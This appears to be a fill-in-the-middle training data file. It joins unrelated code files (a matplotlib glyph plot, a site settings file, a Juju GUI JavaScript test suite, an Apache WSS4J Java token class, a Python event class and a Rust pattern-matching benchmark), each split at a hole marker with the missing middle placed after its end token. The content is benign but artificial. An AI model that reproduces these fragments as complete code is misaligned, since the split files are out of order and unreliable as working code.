codes.append(Path.CURVE3) for i in range(1,len(segment)-2): A,B = segment[i], segment[i+1] C = ((A[0]+B[0])/2.0, (A[1]+B[1])/2.0) verts.extend([ C, B ]) codes.extend([ Path.CURVE3, Path.CURVE3]) verts.append(segment[-1])<|fim▁hole|> # Draw glyph lines path = Path(VERTS, CODES) glyph = patches.PathPatch(path, facecolor='.75', lw=1) # Draw "control" lines for i, code in enumerate(CODES): if code == Path.CURVE3: CODES[i] = Path.LINETO path = Path(VERTS, CODES) patch = patches.PathPatch(path, ec='.5', fill=False, ls='dashed', lw=1 ) axis.add_patch(patch) axis.add_patch(glyph) axis.set_xlim(x.min()-100, x.max()+100) plt.xticks([]) axis.set_ylim(y.min()-100, y.max()+100) plt.yticks([]) plt.show()<|fim▁end|>
codes.append(Path.CURVE3) VERTS.extend(verts) CODES.extend(codes) start = end+1
<|file_name|>githubpages_settings.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- """ Production settings file for project 'project' """ from project.settings import * <|fim▁hole|>SITE_DOMAIN = 'sveetch.github.io/Sveetoy' # Directory where all stuff will be builded PUBLISH_DIR = os.path.join(PROJECT_DIR, '../docs') # Path where will be moved all the static files, usually this is a directory in # the ``PUBLISH_DIR`` STATIC_DIR = os.path.join(PROJECT_DIR, PUBLISH_DIR, 'static')<|fim▁end|>
DEBUG = False
<|file_name|>test_browser_charm_details.js<|end_file_name|><|fim▁begin|><|fim▁hole|>environments within a graphical interface (https://launchpad.net/juju-gui). Copyright (C) 2012-2013 Canonical Ltd. This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License version 3, as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranties of MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. */ 'use strict'; (function() { describe('Browser charm view', function() { var container, CharmView, cleanIconHelper, factory, models, node, utils, view, views, Y, testContainer; before(function(done) { Y = YUI(GlobalConfig).use( 'datatype-date', 'datatype-date-format', 'charmstore-api', 'json-stringify', 'juju-charm-models', 'juju-tests-utils', 'juju-tests-factory', 'node', 'node-event-simulate', 'subapp-browser-charmview', function(Y) { views = Y.namespace('juju.browser.views'); models = Y.namespace('juju.models'); utils = Y.namespace('juju-tests.utils'); factory = Y.namespace('juju-tests.factory'); CharmView = views.BrowserCharmView; cleanIconHelper = utils.stubCharmIconPath(); done(); }); }); beforeEach(function() { window.flags = {}; container = utils.makeContainer(this, 'container'); var testcontent = [ '<div id=testcontent><div class="bws-view-data">', '</div></div>' ].join(); Y.Node.create(testcontent).appendTo(container); // Mock out a dummy location for the Store used in view instances. window.juju_config = { charmworldURL: 'http://localhost' }; node = Y.one('#testcontent'); }); afterEach(function() { window.flags = {}; if (view) { view.destroy(); } if (testContainer) { testContainer.remove(true); } node.remove(true); delete window.juju_config; container.remove(true); }); after(function() { cleanIconHelper(); }); it('renders for inspector mode correctly', function() { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(this), forInspector: true }); view.render(); assert.isNull(view.get('container').one('.heading')); // There is no 'related charms' tab to display. assert.equal(view.get('container').all('.related-charms').size(), 0); }); // Return the charm heading node included in the charm detail view. var makeHeading = function(context, is_subordinate) { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. 
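// makeHeading renders a charm with the given subordinate flag and returns the header node for the assertions below.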
data.files = []; data.is_subordinate = is_subordinate; utils.makeContainer(context); view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(context) }); view.render(); var heading = view.get('container').one('.header'); assert.isNotNull(heading); return heading; }; it('avoids showing the subordinate message for non-subordinate charms', function() { var heading = makeHeading(this, false); assert.notInclude(heading.getContent(), 'Subordinate charm'); }); it('shows the subordinate message if the charm is a subordinate', function() { var heading = makeHeading(this, true); assert.include(heading.getContent(), 'Subordinate charm'); }); it('renders local charms for inspector mode correctly', function() { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; data.url = 'local:precise/apache2-10'; var charm = new models.Charm(data); charm.set('scheme', 'local'); view = new CharmView({ entity: charm, container: utils.makeContainer(this), forInspector: true }); view.render(); assert.isNull(view.get('container').one('.heading')); assert.isNull(view.get('container').one('#readme')); assert.isNull(view.get('container').one('#configuration')); assert.isNull(view.get('container').one('#code')); assert.isNull(view.get('container').one('#features')); }); it('has sharing links', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/wordpress', code_source: { location: 'lp:~foo'} }), container: utils.makeContainer(this), charmstore: factory.makeFakeCharmstore() }); view.render(); var links = container.all('#sharing a'); assert.equal(links.size(), 3); }); it('should be able to locate a readme file', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo' } }) }); view._locateReadme().should.eql('readme.rst'); // Matches for caps as well. 
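// An upper-case README filename must be located just like a lower-case one.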
view.get('entity').set('files', [ 'hooks/install', 'README.md' ]); view._locateReadme().should.eql('README.md'); }); it('can generate source, bug, and revno links from its charm', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/ceph-9', name: 'ceph', code_source: { location: 'lp:~foo'} }) }); var url = view._getSourceLink( view.get('entity').get('code_source').location); assert.equal('http://bazaar.launchpad.net/~foo/files', url); assert.equal( 'http://bazaar.launchpad.net/~foo/revision/1', view._getRevnoLink(url, 1)); assert.equal( 'https://bugs.launchpad.net/charms/+source/ceph', view._getBugLink(view.get('entity').get('name'))); }); it('excludes source svg files from the source tab', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'icon.svg', 'readme.rst' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo'} }), container: utils.makeContainer(this) }); view.render(); var options = Y.one('#code').all('select option'); assert.equal(options.size(), 3); assert.deepEqual( options.get('text'), ['Select --', 'readme.rst', 'hooks/install']); }); it('can generate useful display data for commits', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo' } }) }); var revisions = [ { authors: [{ email: '[email protected]', name: 'John Doe' }], date: '2013-05-02T10:05:32Z', message: 'The fnord had too much fleem.', revno: 1 }, { authors: [{ email: '[email protected]', name: 'John Doe' }], date: '2013-05-02T10:05:45Z', message: 'Fnord needed more fleem.', revno: 2 } ]; var url = view._getSourceLink( view.get('entity').get('code_source').location); var commits = view._formatCommitsForHtml(revisions, url); assert.equal( 'http://bazaar.launchpad.net/~foo/revision/1', commits.first.revnoLink); assert.equal( 'http://bazaar.launchpad.net/~foo/revision/2', commits.remaining[0].revnoLink); }); it('should be able to display the readme content', function() { view = new CharmView({ activeTab: '#readme', entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo'} }), container: utils.makeContainer(this), charmstore: { getFile: function(url, filename, success, failure) { success({ target: { responseText: 'README content.' } }); } } }); view.render(); Y.one('#readme').get('text').should.eql('README content.'); }); // EVENTS it('should catch when the add control is clicked', function(done) { view = new CharmView({ activeTab: '#readme', entity: new models.Charm({ files: [ 'hooks/install' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo' } }), container: utils.makeContainer(this) }); // Hook up to the callback for the click event. 
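// Replace the handler so the simulated click just asserts the empty-README heading and ends the async test.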
view._addCharmEnvironment = function(ev) { ev.halt(); Y.one('#readme h3').get('text').should.eql('Charm has no README'); done(); }; view.render(); node.one('.charm .add').simulate('click'); }); it('_addCharmEnvironment displays the config panel', function(done) { var fakeStore = new Y.juju.charmstore.APIv4({ charmstoreURL: 'localhost/' }); view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install' ], id: 'precise/ceph-9', url: 'cs:precise/ceph-9', code_source: { location: 'lp:~foo' }, options: { configName: 'test' } }), container: utils.makeContainer(this), charmstore: fakeStore }); var fireStub = utils.makeStubMethod(view, 'fire'); this._cleanups.push(fireStub.reset); view.set('deployService', function(charm, serviceAttrs) { var serviceCharm = view.get('entity'); assert.deepEqual(charm, serviceCharm); assert.equal(charm.get('id'), 'cs:precise/ceph-9'); assert.equal(serviceAttrs.icon, 'localhost/v4/precise/ceph-9/icon.svg'); assert.equal(fireStub.calledOnce(), true); var fireArgs = fireStub.lastArguments(); assert.equal(fireArgs[0], 'changeState'); assert.deepEqual(fireArgs[1], { sectionA: { component: 'charmbrowser', metadata: { id: null }}}); done(); }); view._addCharmEnvironment({halt: function() {}}); }); it('should load a file when a hook is selected', function() { view = new CharmView({ entity: new models.Charm({ files: [ 'hooks/install', 'readme.rst' ], id: 'precise/ceph-9', code_source: { location: 'lp:~foo' } }), container: utils.makeContainer(this), charmstore: { getFile: function(url, filename, success, failure) { success({ target: { responseText: '<install hook content>' } }); } } }); view.render(); Y.one('#code').all('select option').size().should.equal(3); // Select the hooks install and the content should update. Y.one('#code').all('select option').item(2).set( 'selected', 'selected'); Y.one('#code').one('select').simulate('change'); var content = Y.one('#code').one('div.filecontent'); // Content is escaped, so we read it out as text, not tags. content.get('text').should.eql('<install hook content>'); }); it('should be able to render markdown as html', function() { view = new CharmView({ activeTab: '#readme', entity: new models.Charm({ files: [ 'readme.md' ], id: 'precise/wordpress-9', code_source: { location: 'lp:~foo' } }), container: utils.makeContainer(this), charmstore: { getFile: function(url, filename, success, failure) { success({ target: { responseText: 'README Header\n=============' } }); } } }); view.render(); Y.one('#readme').get('innerHTML').should.eql( '<h1>README Header</h1>'); }); it('should display the config data in the config tab', function() { view = new CharmView({ entity: new models.Charm({ files: [], id: 'precise/ceph-9', code_source: { location: 'lp:~foo' }, options: { 'client-port': { 'default': 9160, 'description': 'Port for client communcation', 'type': 'int' } } }), container: utils.makeContainer(this) }); view.render(); Y.one('#configuration dd div').get('text').should.eql( 'Default: 9160'); Y.one('#configuration dd p').get('text').should.eql( 'Port for client communcation'); }); it('should catch when the open log is clicked', function(done) { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(this) }); // Hook up to the callback for the click event. 
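// Stub _toggleLog so the simulated click on the expand control simply completes the test.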
view._toggleLog = function(ev) { ev.halt(); done(); }; view.render(); node.one('.changelog .expand').simulate('click'); }); it('changelog is reformatted and displayed', function() { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(this) }); view.render(); // Basics that we have the right number of nodes. node.all('.remaining li').size().should.eql(9); node.all('.first p').size().should.eql(1); // The reminaing starts out hidden. assert(node.one('.changelog .remaining').hasClass('hidden')); }); it('_getInterfaceIntroFlag sets the flag for no requires, no provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { }, 'requires': { } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'noRequiresNoProvides')); }); it('_getInterfaceIntroFlag sets the flag for no requires, 1 provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {} }, 'requires': { } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'noRequiresOneProvides')); }); it('_getInterfaceIntroFlag sets the flag for no requires, many provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {}, 'two': {} }, 'requires': { } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'noRequiresManyProvides')); }); it('_getInterfaceIntroFlag sets the flag for 1 requires, no provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { }, 'requires': { 'foo': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'oneRequiresNoProvides')); }); it('_getInterfaceIntroFlag sets the flag for 1 requires, 1 provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {} }, 'requires': { 'foo': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'oneRequiresOneProvides')); }); it('_getInterfaceIntroFlag sets the flag for 1 requires, many provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {}, 'two': {} }, 'requires': { 'foo': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'oneRequiresManyProvides')); }); it('_getInterfaceIntroFlag sets the flag for many requires, no provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { }, 'requires': { 'foo': {}, 'two': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( 
charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'manyRequiresNoProvides')); }); it('_getInterfaceIntroFlag sets the flag for many requires, 1 provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {} }, 'requires': { 'foo': {}, 'two': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'manyRequiresOneProvides')); }); it('_getInterfaceIntroFlag sets the flag for many requires, many provides', function() { var charm = new models.Charm({ files: [], id: 'precise/ceph-9', relations: { 'provides': { 'foo': {}, 'two': {} }, 'requires': { 'foo': {}, 'two': {} } } }); view = new CharmView({ entity: charm }); var interfaceIntro = view._getInterfaceIntroFlag( charm.get('requires'), charm.get('provides')); assert(Y.Object.hasKey(interfaceIntro, 'manyRequiresManyProvides')); }); it('shows and hides an indicator', function(done) { var hit = 0; var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(this) }); view.showIndicator = function() { hit += 1; }; view.hideIndicator = function() { hit += 1; hit.should.equal(2); done(); }; view.render(); }); it('selects the proper tab when given one', function() { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ activeTab: '#configuration', entity: new models.Charm(data), container: utils.makeContainer(this) }); view.render(); // We've selected the activeTab specified. var selected = view.get('container').one('nav .active'); assert.equal(selected.getAttribute('href'), '#configuration'); }); it('sets the proper change request when closed', function(done) { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ activeTab: '#configuration', entity: new models.Charm(data), container: utils.makeContainer(this) }); view.on('changeState', function(ev) { assert.equal(ev.details[0].sectionA.metadata.id, null, 'The charm id is not set to null.'); assert.equal(ev.details[0].sectionA.metadata.hash, null, 'The charm details hash is not set to null.'); done(); }); view.render(); view.get('container').one('.charm .back').simulate('click'); }); it('renders related charms when interface tab selected', function() { var data = utils.loadFixture('data/browsercharm.json', true); testContainer = utils.makeContainer(this); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ activeTab: '#related-charms', entity: new models.Charm(data), renderTo: testContainer }); view.render(); assert.equal( testContainer.all('#related-charms .token').size(), 18); assert.equal(view.get('entity').get('id'), 'cs:precise/apache2-27'); assert.isTrue(view.loadedRelatedInterfaceCharms); }); it('ignore invalid tab selections', function() { var data = utils.loadFixture('data/browsercharm.json', true); testContainer = utils.makeContainer(this); // We don't want any files so we don't have to mock/load them. 
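// The bogus '#bws-does-not-exist' tab below is expected to fall back to the default #summary tab.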
data.files = []; var fakeStore = factory.makeFakeCharmstore(); view = new CharmView({ activeTab: '#bws-does-not-exist', entity: new models.Charm(data), renderTo: testContainer, charmstore: fakeStore }); view.render(); assert.equal( testContainer.one('nav .active').getAttribute('href'), '#summary'); }); it('should open header links in a new tab', function() { var data = utils.loadFixture('data/browsercharm.json', true); // We don't want any files so we don't have to mock/load them. data.files = []; view = new CharmView({ entity: new models.Charm(data), container: utils.makeContainer(this) }); view.render(); var links = view.get('container').all('.header .details li a'); // Check that we've found the links, otherwise the assert in .each will // succeed when there are no links. assert.equal(links.size() > 0, true); links.each(function(link) { assert.equal(link.getAttribute('target'), '_blank'); }); }); }); })();<|fim▁end|>
/* This file is part of the Juju GUI, which lets users view and manage Juju
<|file_name|>UsernameSecurityTokenImpl.java<|end_file_name|><|fim▁begin|>/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.wss4j.stax.impl.securityToken; import org.apache.wss4j.common.bsp.BSPRule; import org.apache.wss4j.common.ext.WSSecurityException; import org.apache.wss4j.common.principal.UsernameTokenPrincipal; import org.apache.wss4j.common.util.UsernameTokenUtil; import org.apache.wss4j.stax.ext.WSInboundSecurityContext; import org.apache.wss4j.stax.ext.WSSConstants; import org.apache.wss4j.stax.securityToken.UsernameSecurityToken; import org.apache.wss4j.stax.securityToken.WSSecurityTokenConstants; import org.apache.xml.security.exceptions.XMLSecurityException; import org.apache.xml.security.stax.config.JCEAlgorithmMapper; import org.apache.xml.security.stax.ext.XMLSecurityConstants; import org.apache.xml.security.stax.impl.securityToken.AbstractInboundSecurityToken; import javax.crypto.spec.SecretKeySpec; import javax.security.auth.Subject; import java.security.Key; import java.security.Principal; public class UsernameSecurityTokenImpl extends AbstractInboundSecurityToken implements UsernameSecurityToken { private static final long DEFAULT_ITERATION = 1000; private WSSConstants.UsernameTokenPasswordType usernameTokenPasswordType; private String username; private String password; private String createdTime; private byte[] nonce; private byte[] salt; private Long iteration; private final WSInboundSecurityContext wsInboundSecurityContext; private Subject subject; private Principal principal; public UsernameSecurityTokenImpl(WSSConstants.UsernameTokenPasswordType usernameTokenPasswordType, String username, String password, String createdTime, byte[] nonce, byte[] salt, Long iteration, WSInboundSecurityContext wsInboundSecurityContext, String id, WSSecurityTokenConstants.KeyIdentifier keyIdentifier) { super(wsInboundSecurityContext, id, keyIdentifier, true); this.usernameTokenPasswordType = usernameTokenPasswordType; this.username = username; this.password = password;<|fim▁hole|> this.salt = salt; this.iteration = iteration; this.wsInboundSecurityContext = wsInboundSecurityContext; } @Override public boolean isAsymmetric() throws XMLSecurityException { return false; } @Override protected Key getKey(String algorithmURI, XMLSecurityConstants.AlgorithmUsage algorithmUsage, String correlationID) throws XMLSecurityException { Key key = getSecretKey().get(algorithmURI); if (key != null) { return key; } byte[] secretToken = generateDerivedKey(wsInboundSecurityContext); String algoFamily = JCEAlgorithmMapper.getJCEKeyAlgorithmFromURI(algorithmURI); key = new SecretKeySpec(secretToken, algoFamily); setSecretKey(algorithmURI, key); return key; } @Override public WSSecurityTokenConstants.TokenType getTokenType() { return 
WSSecurityTokenConstants.UsernameToken; } /** * This method generates a derived key as defined in WSS Username * Token Profile. * * @return Returns the derived key a byte array * @throws WSSecurityException */ public byte[] generateDerivedKey() throws WSSecurityException { return generateDerivedKey(wsInboundSecurityContext); } /** * This method generates a derived key as defined in WSS Username * Token Profile. * * @return Returns the derived key a byte array * @throws org.apache.wss4j.common.ext.WSSecurityException * */ protected byte[] generateDerivedKey(WSInboundSecurityContext wsInboundSecurityContext) throws WSSecurityException { if (wsInboundSecurityContext != null) { if (salt == null || salt.length == 0) { wsInboundSecurityContext.handleBSPRule(BSPRule.R4217); } if (iteration == null || iteration < DEFAULT_ITERATION) { wsInboundSecurityContext.handleBSPRule(BSPRule.R4218); } } return UsernameTokenUtil.generateDerivedKey(password, salt, iteration.intValue()); } @Override public Principal getPrincipal() throws WSSecurityException { if (this.principal == null) { this.principal = new UsernameTokenPrincipal() { //todo passwordType and passwordDigest return Enum-Type ? @Override public boolean isPasswordDigest() { return usernameTokenPasswordType == WSSConstants.UsernameTokenPasswordType.PASSWORD_DIGEST; } @Override public String getPasswordType() { return usernameTokenPasswordType.getNamespace(); } @Override public String getName() { return username; } @Override public String getPassword() { return password; } @Override public String getCreatedTime() { return createdTime; } @Override public byte[] getNonce() { return nonce; } }; } return this.principal; } public WSSConstants.UsernameTokenPasswordType getUsernameTokenPasswordType() { return usernameTokenPasswordType; } public String getCreatedTime() { return createdTime; } public String getPassword() { return password; } public String getUsername() { return username; } public byte[] getNonce() { return nonce; } public byte[] getSalt() { return salt; } public Long getIteration() { return iteration; } public void setSubject(Subject subject) { this.subject = subject; } @Override public Subject getSubject() throws WSSecurityException { return subject; } }<|fim▁end|>
this.createdTime = createdTime; this.nonce = nonce;
<|file_name|>event.py<|end_file_name|><|fim▁begin|>from builtins import object import abc<|fim▁hole|>class Event(object): @abc.abstractmethod def trigger(self, *args, **kwargs): pass<|fim▁end|>
<|file_name|>pattern_matching.rs<|end_file_name|><|fim▁begin|>#![feature(test)] extern crate test; extern crate bio; use test::Bencher; use bio::pattern_matching::shift_and::ShiftAnd; use bio::pattern_matching::bndm::BNDM; use bio::pattern_matching::kmp::KMP; use bio::pattern_matching::bom::BOM; use bio::pattern_matching::horspool::Horspool; static TEXT: &'static [u8] = b"GATCACAGGTCTATCACCCTATTAACCACTCACGGGAGCTCTCCATGC\ ATTTGGTATTTTCGTCTGGGGGGTATGCACGCGATAGCATTGCGAGACGCTGGAGCCGGAGCACCCTATGTCGCAGTAT\ CTGTCTTTGATTCCTGCCTCATCCTATTATTTATCGCACCTACGTTCAATATTACAGGCGAACATACTTACTAAAGTGT\ GTTAATTAATTAATGCTTGTAGGACATAATAATAACAATTGAATGTCTGCACAGCCACTTTCCACACAGACATCATAAC\ AAAAAATTTCCACCAAACCCCCCCTCCCCCGCTTCTGGCCACAGCACTTAAACACATCTCTGCCAAACCCCAAAAACAA\ AGAACCCTAACACCAGCCTAACCAGATTTCAAATTTTATCTTTTGGCGGTATGCACTTTTAACAGTCACCCCCCAACTA\ ACACATTATTTTCCCCTCCCACTCCCATACTACTAATCTCATCAATACAACCCCCGCCCATCCTACCCAGCACACACAC\ ACCGCTGCTAACCCCATACCCCGAACCAACCAAACCCCAAAGACACCCCCCACAGTTTATGTAGCTTACCTCCTCAAAG\ CAATACACTGAAAATGTTTAGACGGGCTCACATCACCCCATAAACAAATAGGTTTGGTCCTAGCCTTTCTATTAGCTCT\ TAGTAAGATTACACATGCAAGCATCCCCGTTCCAGTGAGTTCACCCTCTAAATCACCACGATCAAAAGGAACAAGCATC\ AAGCACGCAGCAATGCAGCTCAAAACGCTTAGCCTAGCCACACCCCCACGGGAAACAGCAGTGATTAACCTTTAGCAAT\<|fim▁hole|>AAGTCAATAGAAGCCGGCGTAAAGAGTGTTTTAGATCACCCCCTCCCCAATAAAGCTAAAACTCACCTGAGTTGTAAAA\ AACTCCAGTTGACACAAAATAGACTACGAAAGTGGCTTTAACATATCTGAACACACAATAGCTAAGACCCAAACTGGGA\ TTAGATACCCCACTATGCTTAGCCCTAAACCTCAACAGTTAAATCAACAAAACTGCTCGCCAGAACACTACGAGCCACA\ GCTTAAAACTCAAAGGACCTGGCGGTGCTTCATATCCCTCTAGAGGAGCCTGTTCTGTAATCGATAAACCCCGATCAAC\ CTCACCACCTCTTGCTCAGCCTATATACCGCCATCTTCAGCAAACCCTGATGAAGGCTACAAAGTAAGCGCAAGTACCC\ ACGTAAAGACGTTAGGTCAAGGTGTAGCCCATGAGGTGGCAAGAAATGGGCTACATTTTCTACCCCAGAAAACTACGAT\ AGCCCTTATGAAACTTAAGGGTCGAAGGTGGATTTAGCAGTAAACTAAGAGTAGAGTGCTTAGTTGAACAGGGCCCTGA\ AGCGCGTACACACCGCCCGTCACCCTCCTCAAGTATACTTCAAAGGACATTTAACTAAAACCCCTACGCATTTATATAG\ AGGAGACAAGTCGTAACATGGTAAGTGTACTGGAAAGTGCACTTGGACGAACCAGAGTGTAGCTTAACACAAAGCACCC\ AACTTACACTTAGGAGATTTCAACTTAACTTGACCGCTCTGAGCTAAACCTAGCCCCAAACCCACTCCACCTTACTACC\ AGACAACCTTAGCCAAACCATTTACCCAAATAAAGTATAGGCGATAGAAATTGAAACCTGGCGCAATAGATATAGTACC\ GCAAGGGAAAGATGAAAAATTATAACCAAGCATAATATAGCAAGGACTAACCCCTATACCTTCTGCATAATGAATTAAC\ TAGAAATAACTTTGCAAGGAGAGCCAAAGCTAAGACCCCCGAAACCAGACGAGCTACCTAAGAACAGCTAAAAGAGCAC\ ACCCGTCTATGTAGCAAAATAGTGGGAAGATTTATAGGTAGAGGCGACAAACCTACCGAGCCTGGTGATAGCTGGTTGT\ CCAAGATAGAATCTTAGTTCAACTTTAAATTTGCCCACAGAACCCTCTAAATCCCCTTGTAAATTTAACTGTTAGTCCA\ AAGAGGAACAGCTCTTTGGACACTAGGAAAAAACCTTGTAGAGAGAGTAAAAAATTTAACACCCATAGTAGGCCTAAAA\ GCAGCCACCAATTAAGAAAGCGTTCAAGCTCAACACCCACTACCTAAAAAATCCCAAACATATAACTGAACTCCTCACA\ CCCAATTGGACCAATCTATCACCCTATAGAAGAACTAATGTTAGTATAAGTAACATGAAAACATTCTCCTCCGCATAAG\ CCTGCGTCAGATTAAAACACTGAACTGACAATTAACAGCCCAATATCTACAATCAACCAACAAGTCATTATTACCCTCA\ CTGTCAACCCAACACAGGCATGCTCATAAGGAAAGGTTAAAAAAAGTAAAAGGAACTCGGCAAATCTTACCCCGCCTGT\ TTACCAAAAACATCACCTCTAGCATCACCAGTATTAGAGGCACCGCCTGCCCAGTGACACATGTTTAACGGCCGCGGTA\ CCCTAACCGTGCAAAGGTAGCATAATCACTTGTTCCTTAAATAGGGACCTGTATGAATGGCTCCACGAGGGTTCAGCTG\ TCTCTTACTTTTAACCAGTGAAATTGACCTGCCCGTGAAGAGGCGGGCATAACACAGCAAGACGAGAAGACCCTATGGA\ GCTTTAATTTATTAATGCAAACAGTACCTAACAAACCCACAGGTCCTAAACTACCAAACCTGCATTAAAAATTTCGGTT\ GGGGCGACCTCGGAGCAGAACCCAACCTCCGAGCAGTACATGCTAAGACTTCACCAGTCAAAGCGAACTACTATACTCA\ ATTGATCCAATAACTTGACCAACGGAACAAGTTACCCTAGGGATAACAGCGCAATCCTATTCTAGAGTCCATATCAACA\ ATAGGGTTTACGACCTCGATGTTGGATCAGGACATCCCGATGGTGCAGCCGCTATTAAAGGTTCGTTTGTTCAACGATT\ AAAGTCCTACGTGATCTGAGTTCAGACCGGAGTAATCCAGGTCGGTTTCTATCTACNTTCAAATTCCTCCCTGTACGAA\ 
AGGACAAGAGAAATAAGGCCTACTTCACAAAGCGCCTTCCCCCGTAAATGATATCATCTCAACTTAGTATTATACCCAC\ ACCCACCCAAGAACAGGGTTTGTTAAGATGGCAGAGCCCGGTAATCGCATAAAACTTAAAACTTTACAGTCAGAGGTTC\ AATTCCTCTTCTTAACAACATACCCATGGCCAACCTCCTACTCCTCATTGTACCCATTCTAATCGCAATGGCATTCCTA\ ATGCTTACCGAACGAAAAATTCTAGGCTATATACAACTACGCAAAGGCCCCAACGTTGTAGGCCCCTACGGGCTACTAC\ AACCCTTCGCTGACGCCATAAAACTCTTCACCAAAGAGCCCCTAAAACCCGCCACATCTACCATCACCCTCTACATCAC\ CGCCCCGACCTTAGCTCTCACCATCGCTCTTCTACTATGAACCCCCCTCCCCATACCCAACCCCCTGGTCAACCTCAAC\ CTAGGCCTCCTATTTATTCTAGCCACCTCTAGCCTAGCCGTTTACTCAATCCTCTGATCAGGGTGAGCATCAAACTCAA\ ACTACGCCCTGATCGGCGCACTGCGAGCAGTAGCCCAAACAATCTCATATGAAGTCACCCTAGCCATCATTCTACTATC\ AACATTACTAATAAGTGGCTCCTTTAACCTCTCCACCCTTATCACAACACAAGAACACCTCTGATTACTCCTGCCATCA\ TGACCCTTGGCCATAATATGATTTATCTCCACACTAGCAGAGACCAACCGAACCCCCTTCGACCTTGCCGAAGGGGAGT\ CCGAACTAGTCTCAGGCTTCAACATCGAATACGCCGCAGGCCCCTTCGCCCTATTCTTCATAGCCGAATACACAAACAT\ TATTATAATAAACACCCTCACCACTACAATCTTCCTAGGAACAACATATGACGCACTCTCCCCTGAACTCTACACAACA\ TATTTTGTCACCAAGACCCTACTTCTAACCTCCCTGTTCTTATGAATTCGAACAGCATACCCCCGATTCCGCTACGACC\ AACTCATACACCTCCTATGAAAAAACTTCCTACCACTCACCCTAGCATTACTTATATGATATGTCTCCATACCCATTAC\ AATCTCCAGCATTCCCCCTCAAACCTAAGAAATATGTCTGATAAAAGAGTTACTTTGATAGAGTAAATAATAGGAGCTT\ AAACCCCCTTATTTCTAGGACTATGAGAATCGAACCCATCCCTGAGAATCCAAAATTCTCCGTGCCACCTATCACACCC\ 